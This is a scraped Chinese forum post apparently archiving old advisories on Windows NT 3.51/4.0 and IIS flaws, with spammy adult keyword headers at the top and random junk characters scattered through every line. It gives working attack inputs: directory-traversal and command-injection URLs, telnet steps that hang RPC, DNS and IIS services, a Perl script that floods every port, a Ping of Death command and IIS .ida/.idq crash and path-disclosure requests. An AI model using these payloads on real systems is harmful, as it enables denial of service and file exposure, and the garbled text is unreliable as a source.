久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

    1. <sub id="9pxky"></sub>
    2. <small id="9pxky"></small>

           找回密碼
           注冊

          QQ登錄

          只需一步,快速開始

          NT的漏洞及描述(英文)

          [復(fù)制鏈接]
          1#
          發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
          受影響系統(tǒng):4.0,iis 1.0
          ! e7 B2 P& v2 N% pA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
          4 ?/ j3 h2 y3 H9 C) E- U/ A5 t
          2 X) C# h! b+ y9 g- ^' r/ tA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
          - e; j5 h1 E3 F! f8 G$ T3 J
          7 S% N7 d5 f. f, B% `7 Q) \By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.- Q2 d" t# c! O+ r7 Y" n2 d8 c7 M+ Z
          + |) D8 D0 |$ t' A9 @
          --------------------------------------------------------------------& \- T$ ~9 E; w" e

          ' B5 F. S( q9 }受影響系統(tǒng):4.0
          5 `8 K6 C6 a+ W9 t) IA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''., I, S' ~  `9 @8 ]4 q+ Y' P# {* k
          2 K8 s4 e* w- {4 B0 H3 `% M- b5 u1 \
          If the file 'target.bat' exists, the file will be truncated.
          5 t: j0 g8 m2 A/ t+ g* Z' _2 @6 q- |$ B" G
          5 f: M) u3 W; ]
          A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
          ' }! E& @( ?6 r% Z4 h# {8 C  o$ ?, p9 M/ J; R) _
          ----------------------------------------------------------------------
          " ?+ S2 W* Z; _0 n! h" m$ u
          9 I4 q" S3 I) A# y# ?* |1 c受影響系統(tǒng):3.51,4.0( I5 `; H4 D0 [- j- s
          Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
          - [( `7 v) f' M7 W: Q& S" d' Q9 E# Z# o  C" _
          The following steps;* p% ^/ d4 E: r
          3 x5 d% D- X" l
          Telnet to an NT 4.0 system on port 135
          8 o2 m4 d* \# p5 E, ^Type about 10 characters followed by a <CR> / i4 E/ ^8 T5 L% [- S
          Exit Telnet
          / A# t7 l: f( d/ Nresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
          0 `4 ]  x: D# G) |. Y, ]9 H9 P) v5 r, B- C1 C" C
          When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.6 g& P6 A" f0 O

          # f9 S& {0 t1 e* T+ |' O( N7 MThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.. l8 _3 k( S- ]$ i, I
          $ _. E# r. F) x2 L
          If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
          , z4 c' O  Y- c- ^8 t
          5 g2 s/ s, I, j1 U. X+ x: jThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):$ u3 O4 s' Z/ I. q( H
          9 A8 A0 q) q( T
          /*begin poke code*/
          5 l: A) ~! ?; ?$ z' i2 h) M
          . ~* V, C9 h, E7 b' S  k/ {$ {) Muse Socket;; z, m+ Y) w3 [( N4 T
          use FileHandle;& M. \8 B) m4 M( @3 d% k) l6 X: Z; ]0 a
          require "chat2.pl";- i1 r0 Z  m/ z) b" ?7 o; `

          + o7 o' ]* f9 N1 c) @5 I( K$systemname = $ARGV[0] && shift;
          ; ?8 ?2 q9 g4 E0 ^! M$ y. c
          # K- e7 z7 u3 m  l: t$verbose = 1; # tell me what you're hitting3 O4 L% B$ |" }: v( K8 R$ J
          $knownports = 1; # don't hit known problem ports8 p* Y1 H5 `3 C* L0 ]3 [( _
          for ($port = $0; $port<65535; $port++) # |+ X' |6 n. e, L! G
          {( X% U' I" H* P' N; h) p

          ; J9 B: o' ^4 F# s/ H: N6 R1 Y5 ~& l3 b- w( p  J* R& E0 [$ Y
          if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
          # t: W$ \1 {! y( L5 Q8 Onext;, r4 I  P/ V; B' g
          }$ K# U0 P* U* G9 a* o5 L4 C+ |' m
          $fh = chat::open_port($systemname, $port);
          . g  o, Q- @+ A3 ?2 L" ?+ Lchat::print ($fh,"This is about ten characters or more");6 I& {6 F* A" A& b5 q% K1 J
          if ($verbose) {: g( i+ @0 z2 H& q9 N- w
          print "Trying port: $port\n";
          5 I6 S* b% i+ T* `}
            p" G) u' ~  h8 M! Mchat::close($fh);; p# f0 U6 {! D
          + |1 Y3 W8 f$ ~& k7 t+ ^; y
          }2 M+ b8 S! n0 Q( {: ^% N; K

          4 W* r$ n7 r5 J: |& m! T% l7 e. {
          /*end poke code*/
          1 ?1 x$ G/ L; O
          4 Z, G/ P/ A8 x: D/ O- J6 LSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
          * i$ p/ P& y" Q+ U" Y  v. D
          % t/ R1 J' n5 j% V- z- F# b0 I--------------------------------------------------------------------------------% K4 l$ W# w9 Q4 A8 \& @

          ) k- {  H6 M7 g! X' U受影響系統(tǒng):4.0; y1 o$ C) c6 N  k4 ^. n
          Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
          $ {1 d+ g2 L! A, m
          , V0 W# C( e7 Q7 h! BThis attack causes Dr. Watson to display an alert window and to log an error: 9 D% }& R1 [# R! z) C7 O: t

          9 Z; E  v6 j% V: Q* }) [+ K"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"4 z2 f# j2 _- }1 {& |

            N, w% Q) k! e6 i- s! ]0 W--------------------------------------------------------------------------------
          0 K+ ]+ T( m. o5 @( |* R& H2 `5 r# s
          : C( |/ Y% E6 e3 _! ^4 p受影響系統(tǒng):3.51,4.09 e' j& Z  Z" }' w( I" G1 M" _
          Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
          ; y& o/ ~) ]' ?+ b* A+ w8 {- N# T4 y- `) z3 f0 T/ e; `
          STOP: 0X0000001E
          - W7 `  B( [& F6 z7 NKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS* K- H) Q' I9 M1 k+ q3 M
          0 X- H6 y0 a) j
          -OR-& h" Q5 k1 {: w7 q! C

          * \: U8 I8 Z1 d5 DSTOP: 0x0000000A- |( c& W4 ?5 G. ^( {8 L6 Z( a4 B* r
          IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
          # ]- F5 C  D8 x
          / E4 M( u; `  I3 r( T8 d' C  X! s1 zNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
          ! q7 s, m  X# O& m+ E. ^0 c0 H: g) X2 `
          --------------------------------------------------------------------------------
          1 h7 D: Z& d' }8 V% `; X
          $ E* l1 ~# @  J8 o1 EMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). - s/ [+ s2 t& M* a

          . B  g& P, T( h# W--------------------------------------------------------4 Y( C7 P" q- A

          . `) V3 d, E* \+ c/ ^% AIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
          您需要登錄后才可以回帖 登錄 | 注冊

          本版積分規(guī)則

          QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

          GMT+8, 2025-9-16 14:24

          Powered by Discuz! X3.5

          © 2001-2025 Discuz! Team.

          快速回復(fù) 返回頂部 返回列表